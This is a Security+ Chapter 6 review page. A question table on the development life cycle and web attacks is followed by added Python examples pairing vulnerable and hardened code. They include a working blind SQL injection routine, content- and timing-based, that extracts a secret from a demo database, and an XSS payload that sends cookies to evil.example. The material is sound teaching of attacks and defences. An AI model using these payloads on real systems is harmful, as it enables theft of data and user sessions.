Security+ Chapter 6
Security+ Chapter 6 Review Questions
Question | Answer |
---|---|
Name the phases of the software development life cycle | Planning, requirements, design, coding, testing, training and transition, ongoing operations and maintenance, end-of-life decommissioning |
List steps in the waterfall SDLC model. | Gather requirements, design, implement, test/validate, deploy, maintain |
List four phases used in the spiral model. | Identification, design, build, evaluation |
What are the differences between Agile, Waterfall, and Spiral? | Agile software development is an iterative and incremental process, rather than the linear processes that Waterfall and Spiral use. |
List at least three principles of the Agile methodology. | • Ensure customer satisfaction via early and continuous delivery of the software • Deliver working software frequently (in weeks rather than months) • Pay continuous attention to technical excellence and good design. |
Describe the continuous integration and continuous deployment pipeline. | A developer commits a change, the build process is triggered, the build report is delivered, tests are run against the build, the test report is delivered, and if the tests pass the code is deployed. |
What are APIs? | Application programming interfaces (APIs) are interfaces between clients and servers or applications and operating systems that define how the client should ask for information from the server and how the server will respond. |
What are some examples of informal code review models? | Pair programming, over-the-shoulder, pass-around code reviews, and tool-assisted reviews |
List all six phases of a typical Fagan inspection process. | Planning, overview, preparation, meeting, rework, and follow-up |
What is static code analysis and what is dynamic code analysis? | Static code analysis does not run the program; instead it focuses on understanding how the program is written and what the code is intended to do. Dynamic code analysis relies on executing the code while providing it with input to test the software. |
What does blind SQL injection mean and what are two forms of blind SQL injection? | Blind SQL injection is a technique attackers use to carry out a SQL injection attack even when they cannot view the query results directly. Two forms are content-based (the response content changes depending on whether an injected condition is true) and timing-based (the response is delayed when the injected condition is true). |
Give three ways that an attacker might discover a user’s password. | 1. Conducting social engineering attacks that trick the user into revealing a password. 2. Eavesdropping on unencrypted network traffic. 3. Obtaining a dump of passwords from previously compromised sites. |
Give some ways that an attacker might obtain a cookie. | • Eavesdropping on unencrypted network connections and stealing a copy of the cookie as it is transmitted between the user and the website. • Installing malware on the user’s browser that retrieves cookies and transmits them back to the attacker. |
What is insecure direct object reference? | An insecure direct object reference occurs when an application exposes a direct reference to an internal object (such as a record ID in a URL) and does not perform an authorization check before returning it, so a user may view information that exceeds their authority. |
What are two variants that file inclusion attacks come in? How do they work? | Local file inclusion and remote file inclusion. Local file inclusion attacks seek to execute code stored in a file located elsewhere on the web server. Remote file inclusion attacks go a step further and execute code stored on a remote server. |
When would cross-site scripting attacks occur? | Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. |
What’s the difference between cross-site scripting attacks and cross-site request forgery attacks? | XSS attacks exploit the trust that a user has in a website to execute code on the user’s computer. XSRF (also written CSRF) attacks exploit the trust that a remote site has in a user’s browser session to execute commands on the user’s behalf. |
List some advantages of implementing database normalization. | • Prevent data inconsistency • Prevent update anomalies • Reduce the need for restructuring existing databases • Make the database schema more informative |
List and explain two principles we need to apply in application resilience. | • Scalability says that applications should be designed so that the computing resources they require may be incrementally added to support increasing demand. • Elasticity means that applications should be able to automatically provision resources to scale up when demand increases and release them when demand falls. |
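The blind SQL injection row above is easier to understand with the two forms side by side. The following is an added example written for this review page, not code from the Security+ study guide: it builds a constructed in-memory SQLite database (a `products` table the search endpoint is meant to query and a `users` table it should never expose), a vulnerable lookup that concatenates input into SQL and returns only a yes/no answer, the same lookup hardened with a parameterized query, and an attacker routine that recovers a secret one character at a time. The content-based variant reads the answer from the response; the timing-based variant reads it from a delay. SQLite has no native `sleep()`, so the example registers one through `create_function`; the table names, the secret value and `DELAY` are all assumptions for the demo.

```python
import sqlite3
import string
import time

DELAY = 0.2  # seconds of artificial delay used by the timing-based variant (assumed)


def build_db():
    """Constructed sample data: a product catalogue the app is allowed to
    search, and a users table it should never expose through that search."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)",
                     [("widget",), ("gadget",)])
    conn.execute("CREATE TABLE users (username TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'k3y-7b2')")
    # SQLite has no sleep(); register one so the timing variant can be shown.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return conn


def product_exists_vulnerable(conn, name):
    """Vulnerable: user input is concatenated into the SQL string.
    The caller only learns True/False, never the rows -- the 'blind' case."""
    sql = f"SELECT id FROM products WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def product_exists_safe(conn, name):
    """Hardened: a parameterized query binds the input as data, not SQL."""
    return conn.execute("SELECT id FROM products WHERE name = ?",
                        (name,)).fetchone() is not None


# The value the attacker wants, expressed as a subquery they can embed.
SECRET = "(SELECT api_key FROM users WHERE username = 'admin')"


def content_ask(endpoint, condition):
    """Content-based: the yes/no answer is visible in the response itself."""
    return endpoint(f"widget' AND ({condition})--")


def timing_ask(endpoint, condition):
    """Timing-based: the response looks the same either way; the answer is
    read from how long the request took."""
    payload = f"widget' AND CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END--"
    start = time.monotonic()
    endpoint(payload)
    return time.monotonic() - start >= DELAY / 2


def extract_secret(ask, charset=string.ascii_lowercase + string.digits + "-",
                   max_len=16):
    """Recover the secret one character at a time using only yes/no answers."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if ask(f"substr({SECRET}, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the secret
    return recovered


if __name__ == "__main__":
    db = build_db()
    vuln = lambda name: product_exists_vulnerable(db, name)
    safe = lambda name: product_exists_safe(db, name)
    print("content-based, vulnerable:", extract_secret(lambda c: content_ask(vuln, c)))
    print("timing-based,  vulnerable:", extract_secret(lambda c: timing_ask(vuln, c)))
    print("content-based, hardened:  ", repr(extract_secret(lambda c: content_ask(safe, c))))
```

Against the vulnerable endpoint both oracles recover `k3y-7b2` without ever seeing a row; against the parameterized version every question answers "no" because the whole payload is compared as a literal product name, so nothing is recovered.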
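For the insecure direct object reference row, here is an added example (written for this page, not from the study guide) of the vulnerable handler next to two fixes: an authorization check on the looked-up record, and an indirect reference map that hands the client opaque handles instead of raw database keys. The `INVOICES` data, the user names and the handler names are constructed for the demonstration.

```python
import secrets
from dataclasses import dataclass


@dataclass
class Invoice:
    invoice_id: int
    owner: str
    amount: float


# Constructed sample data: sequential IDs belonging to two different customers.
INVOICES = {
    1001: Invoice(1001, "alice", 120.00),
    1002: Invoice(1002, "bob", 75.50),
}


class NotFound(Exception):
    pass


def get_invoice_vulnerable(current_user, invoice_id):
    """IDOR: the handler trusts the ID taken from the URL and never checks who
    owns the record, so alice can read bob's invoice by changing 1001 to 1002."""
    try:
        return INVOICES[invoice_id]
    except KeyError:
        raise NotFound(invoice_id)


def get_invoice_safe(current_user, invoice_id):
    """Hardened: look the record up, then verify the requester may see it.
    The same error is returned for 'missing' and 'not yours', so the endpoint
    cannot be used to enumerate which IDs exist."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.owner != current_user:
        raise NotFound(invoice_id)
    return inv


def build_reference_map(current_user):
    """Alternative defence: give the client random per-session handles and map
    only this user's records, so there is no direct key to tamper with."""
    return {secrets.token_urlsafe(8): inv.invoice_id
            for inv in INVOICES.values() if inv.owner == current_user}


def get_invoice_by_handle(current_user, ref_map, handle):
    invoice_id = ref_map.get(handle)
    if invoice_id is None:
        raise NotFound(handle)
    return get_invoice_safe(current_user, invoice_id)  # still check ownership


def can_read(handler, current_user, invoice_id):
    """Probe helper: True if the handler returns a record for this user."""
    try:
        handler(current_user, invoice_id)
        return True
    except NotFound:
        return False


if __name__ == "__main__":
    print("vulnerable, alice reads 1002:", can_read(get_invoice_vulnerable, "alice", 1002))
    print("hardened,   alice reads 1002:", can_read(get_invoice_safe, "alice", 1002))
    handles = build_reference_map("alice")
    print("alice's handles:", handles)
```

The authorization check is the essential fix; the reference map is defence in depth and is only safe because `get_invoice_by_handle` still calls the ownership check rather than trusting the map alone.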
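The cross-site scripting and cross-site request forgery rows describe two different trust relationships, and the defences are correspondingly different. As an added example (not from the study guide), the block below shows a comment renderer that reflects user text into HTML unescaped next to one that escapes it (XSS), and a money-transfer handler that honours any request carrying the session next to one that also demands a per-session synchronizer token (CSRF). The `SERVER_KEY`, the session identifier format and the handler names are assumptions for the demo; the token here is bound to the session with an HMAC, which is one common way to implement the synchronizer-token pattern.

```python
import hashlib
import hmac
import html
import secrets

# ---- XSS: the site reflects attacker-controlled text into its own page ----

def render_comment_vulnerable(comment):
    """HTML injection: whatever the commenter typed becomes markup."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Escape on output so the text is displayed, never executed."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# ---- CSRF: the site must tell a request the user meant to send from one a
# third-party page caused the browser to send (cookies go along either way) ----

SERVER_KEY = secrets.token_bytes(32)  # assumed per-deployment secret


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session; embedded in the site's own forms.
    A page on evil.example cannot read the victim's cookie, so it cannot compute it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def valid_csrf(session_id, form):
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(supplied, issue_csrf_token(session_id))


def transfer_vulnerable(session_id, form):
    """Any request that arrives with the session cookie is honoured, so a hidden
    auto-submitting form on another site can move money on the victim's behalf."""
    return f"moved {form['amount']} to {form['to']}"


def transfer_safe(session_id, form):
    if not valid_csrf(session_id, form):
        raise PermissionError("missing or invalid CSRF token")
    return transfer_vulnerable(session_id, form)


if __name__ == "__main__":
    # Constructed payloads: a cookie-stealing script and a forged transfer.
    xss = "<script>location='http://evil.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable(xss))
    print(render_comment_safe(xss))
    sid = "sess-" + secrets.token_hex(8)
    forged = {"amount": "500", "to": "attacker"}
    print(transfer_vulnerable(sid, forged))
    print("forged request accepted by safe handler:", valid_csrf(sid, forged))
    legit = dict(forged, csrf_token=issue_csrf_token(sid))
    print(transfer_safe(sid, legit))
```

Note the asymmetry: the XSS fix lives on the output path (escape what you render), while the CSRF fix lives on the input path (prove the request originated from your own page). A real deployment would also set `SameSite` on the session cookie and scope the token per form or per request rather than per session.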